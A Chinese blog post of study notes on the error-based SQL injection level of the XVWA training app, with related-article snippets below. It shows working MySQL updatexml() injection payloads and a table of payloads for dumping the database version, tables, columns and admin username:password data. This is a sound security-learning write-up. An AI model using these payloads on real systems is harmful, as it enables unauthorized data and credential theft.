【白帽子学习笔记15】XVWA SQL Injection

最新推荐文章于 2022-07-22 10:32:35 发布
最新推荐文章于 2022-07-22 10:32:35 发布
阅读量292 收藏
点赞数
分类专栏: 白 帽 子 文章标签: 数据库 mysql sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/python_LC_nohtyp/article/details/107589604
版权

【白帽子学习笔记15】XVWA SQL Injection – Error Based

最后一门高数终于考完了,好开心啊有没有,终于可以自由自在的学技术了,最近准备把渗透的知识好好学一学。今天来总结一下我这个菜鸟在XVWA的学习之路中的第一关

文章目录

0x01 题目

SQL注入,在相当程度上,应用程序安全性中最关键的问题之一,它是一种攻击技术,恶意用户可以使用配置应用程序的特权运行SQL代码。基于错误的SQL注入很容易检测和进一步利用。它用详细的后端错误消息响应用户的请求。这些错误消息是由于特殊设计的用户请求而产生的,这样会破坏应用程序中使用的SQL查询语法。

在这里插入图片描述
这道题题目说是基于报错的SQL注入,但是后来发现好像联合查询也可以用,算了我们先试试可以查询出来什么信息吧

0x02 不看代码的前提下参数注入

先来一波经典1=1

在这里插入图片描述
通过报错信息我们可以知道这个数据库是Mysql数据库

接下来我们有两种思路,一种是使用UpdateXml() MYSQL显错注入,还有一种就是使用联合查询

0x021 UpdateXml() MYSQL显错注入

想来介绍一下什么是UpdateXml()

UPDATEXML (XML_document, XPath_string, new_value);
第一个参数:XML_document是String格式,为XML文档对象的名称,文中为Doc
第二个参数:XPath_string (Xpath格式的字符串) ,如果不了解Xpath语法,可以在网上查找教程。
第三个参数:new_value,String格式,替换查找到的符合条件的数据
然后我们需要配合concat语法,就可以把我们想要的东西在错误信息中显示出来

比如:
http://www.XXXIII.com/a.php?id=1 and updatexml(1,concat(0x7e,database(),0x7e),1)
因为concat返回的结果肯定不符合Xpath的语法格式,肯定会报错,这样我们就可以得到数据库的信息了

比如我们构造这样的
1' and updatexml(1,concat(0x7e,(database()),0x7e),1)#
报错信息中就会显示数据库的名字了。建议还是在Burp Suite里尝试,这样更方便一点

在这里插入图片描述

0x022 updatexml() 在SQL注入中的应用

updatexml()的应用

功能语句
爆数据库版本updatexml(1,concat(0x7e,(SELECT @@version),0x7e)
链接用户updatexml(1,concat(0x7e,(SELECT user()),0x7e)
爆库updatexml(1,concat(0x7e,(SELECT database()),0x7e)
爆表updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select table_name),0x7e) FROM admin limit 0,1),0x7e)
爆字段updatexml(1,concat(0x7e,(SELECT distinct concat(0x7e, (select column_name),0x7e) FROM admin limit 0,1)
爆字段内容updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e)

0x03 union查询

这个题目既可以基于报错,也可以盲注,第二题就是基本一样然后把代码给改了改。

我们先进行几波尝试,然后就可以爆出数据库名。

在这里插入图片描述

AndSonder
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
渗透练习-XVWA渗透测试靶场
01-26
Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势巩固渗透测试知识。建议将这个靶场部署在本地服务器来提升你的能力。 指令:XVWA采用一站式安装,你可以在windows, linux 或 Mac平台下进行设置,为了能正常使用XVMA你需要按以下几个步骤配置Apache-PHP-MYSQL环境,这里我们使用的是XAMP,你也可以自己选择喜欢的集成包。 将xvwa文件复制到你的web目录,确保目录名依旧为xvwa。 配合kali效果更佳
帽子学习路线
03-21
XVWA SQL Injection – Error Based/SQL Injection – Blind
baynk的博客
03-25 310
0x00 SQL Injection – Error Based手工审计 一共两个文件,先看主页index.php,只有包含。 <?php include('home.php'); ?> 接着再看home.php源代码,发现有两处传入参数j进行数据库操作,两处参数均无过滤。 $item = isset($_POST['item']) ? $...
XVWA通关教程
Bu2n的博客
12-03 866
文章目录靶场介绍靶场安装SQL injection 靶场介绍 XVWA 是一个用 PHP/MySQL 编写的编码错误的 Web 应用程序,可帮助安全爱好者学习应用程序安全性。不建议在线托管此应用程序,因为它被设计为“极其脆弱”。我们建议在本地/受控环境中托管此应用程序,并使用您自己选择的任何工具提高您的应用程序安全忍者技能。打破或侵入这个是完全合法的。这个想法是以最简单和基本的方式向社区宣传 Web 应用程序的安全性。出于良好的目的学习和获得这些技能。您如何使用这些技能和知识库不是我们的责任。 靶场安装
最全信息安全帽子黑客的常用命令
independe的博客
07-26 796
poc:验证漏洞是否存在代码 exp:漏洞利用攻击 webshell:web下的shell(web后门) shell:与系统交互的工具通道 反向:受害者到攻击者 正向:攻击者到受害者 菜刀: 一句话: payload: getshell:获取shell权限的方式 肉鸡:即被控制的电脑,也叫傀儡机,常被用于发动ddos攻击。 抓鸡:即设法控制电脑,将其沦为肉鸡。 拿站:即...
seacms sql注入
Matthew
08-30 5721
最近在学习代码审计,审到一个注入,提交,说重复了,好尴尬啊。 源码下载:http://www.mycodes.net/47/7976.htm 在/i.php,获取ip的时候,全局的ip获取是做了正则。不知道问什么这里重新进行了一次ip的获取。<?php session_start(); require_once("include/common.php"); require_once(sea_I
帽子学习笔记】XSS和SQL注入
python_LC_nohtyp的博客
11-17 1509
帽子学习笔记】XSS和SQL注入 yysy姚总布置的实验报告越来越难写了,菜菜的我要写好久,┭┮﹏┭┮ 文章目录【帽子学习笔记】XSS和SQL注入0x01 实验知识点1x01 什么是XSS?1x02 什么是Cookie?1x03 XSS漏洞的分类1x04 SQL注入攻击0x02 XSS部分:Beef1x01 搭建GuestBook网站1x02 AWVS扫描1x03 Kail中使用Beef生成恶意代码1x04 XSS注入漏洞2x01 XSS劫持网站2x02 劫持浏览器指定被劫持网站为学校主
帽子讲Web安全学习笔记之安全观
Jessechanrui的博客
03-11 596
帽子讲Web安全学习笔记 Web安全兴起的里程碑 1、SQL注入 2、XSS(跨站脚本攻击) 安全三要素: 1、机密性 要求保护数据内容不能泄露,加密是实现机密性的常用手段; 2、完整性 要求保护数据内容是完整的,没有被篡改,常见的保证一致性的技术手段是数字签名; 3、可用性 要求保护资源是随需而得的,常见的是拒绝服务攻击,简称DoS; 扩充...
帽子讲Web安全》读书笔记
山河已无恙
12-11 1233
我所渴求的,無非是將心中脫穎語出的本性付諸生活,為何竟如此艱難呢 ------《彷徨少年時》
网易帽子黑客训练营笔记(2)
weixin_52180702的博客
07-22 3619
安全测试 DVWA靶场漏洞详解 安全工具讲解 网易帽子黑客训练营笔记2 web安全体系
一名帽子的心路历程.pdf
08-08
Kiven原本是一名网络运维人员,并不涉信息安全。但在某种机缘巧合下,进入了网络安全这个行当,依托着自己的运维经验,从零学习安全知识,现已有了自己的安全工作室。学习信息安全,任何人任何时候都不晚。
吴翰清:帽子讲Web安全
02-21
安全宝副总裁、前阿里巴巴集团高级安全专家吴翰清将携他的《帽子讲Web安全》一书做客问答栏目。以下为采访正文:吴翰清(刺哥/总,大风哥),安全宝副总裁,前阿里巴巴集团高级安全专家。毕业于西安交通大学少年班...
帽子讲web安全 完整版
03-12
完整版的帽子讲web安全,不是只到12章的那种样章,web安全越来越被人重视
帽子讲Web安全
01-16
帽子讲Web安全》内容简介:在互联网时代,数据安全与个人隐私受到了前所未有的挑战,各种新奇的攻击技术层出不穷。如何才能更好地保护我们的数据?《帽子讲Web安全》将带你走进Web安全的世界,让你了解Web安全...
XVWA黑客靶场发布
刘书的IT博客
10-26 2171
简介 Xtreme Vulnerable Web Application (XVWA)是一款使用PHP/MySQL编写的靶场,可以帮助初学者快速学习安全姿势。 我们建议将这个靶场部署在本地服务器来提升你的能力。当然了学习并掌握这些姿势后,还望各位能够积极的在评论区交流经验,帮助更多的朋友。 XVWA中包含的漏洞 SQL Injection – Error Based
帽子学习笔记21】Kon-boot 使用教程
python_LC_nohtyp的博客
10-26 3142
前言 本文详细介绍你DeDeCMS v5.7版本中的任意用户密码修改漏洞的复现过程。 0x01 网站搭建 在网站搭建方面我们选用小皮(phpstudy pro)来进行快速的搭建。首先我们到官网中下载对应版本到DeDeCMS v5.7 http://www.dedecms.com/products/dedecms/downloads/ 接下来我以windows下的phpstudy pro的搭建来进行介绍 我们首先在小皮的WWW的文件夹下新建一个文件夹叫做dedecms 接下来把刚才从官网里面下载的dedec
CTF杂项思路总结
python_LC_nohtyp的博客
06-28 2607
CTF杂项知识点总结 文章目录CTF杂项知识点总结前言图片隐写方式总结1. 属性隐藏信息2. Hex隐藏信息3. 颜色通道隐写4. 长度隐写5. 文件隐藏流量包隐藏音频文件隐藏 前言 最近参加了学校内部的CTF比赛,还是太菜了。现学现卖了好多东西。不过感觉还是学到不少东西。多参加参加比赛还是有好处的哈哈。第一次在学校通宵,为一件事情付出努力的感觉还是不错滴。 图片隐写方式总结 1. 属性隐藏信息 右击打开文件可能发现神奇的东西 2. Hex隐藏信息 使用010editor或者winhex打开图片的hex格式
python帽子帽子问题
最新发布
05-18
Python帽子和红帽子都是指网络安全领域的人员。帽子是指专门从事网络安全方面的技术研究和攻防测试的人员,他们的目的是为了维护网络安全。而红帽子是黑客的一种,是指专门从事网络攻击的人员。他们的目的是为了...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值